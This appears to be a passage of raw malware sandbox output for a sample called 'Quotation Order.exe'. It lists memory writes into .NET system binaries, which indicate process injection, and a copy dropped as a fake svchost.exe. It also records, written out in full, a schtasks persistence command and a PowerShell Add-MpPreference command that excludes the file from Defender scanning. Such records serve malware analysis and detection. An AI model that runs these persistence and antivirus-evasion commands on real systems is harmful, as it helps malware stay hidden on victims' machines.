                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: CDE008
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: C83008
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\Desktop\Quotation Order.exeQueries volume information: C:\Users\user\Desktop\Quotation Order.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeQueries volume information: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn\v4.0_4.0.0.0__b77a5c561934e089\System.AddIn.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
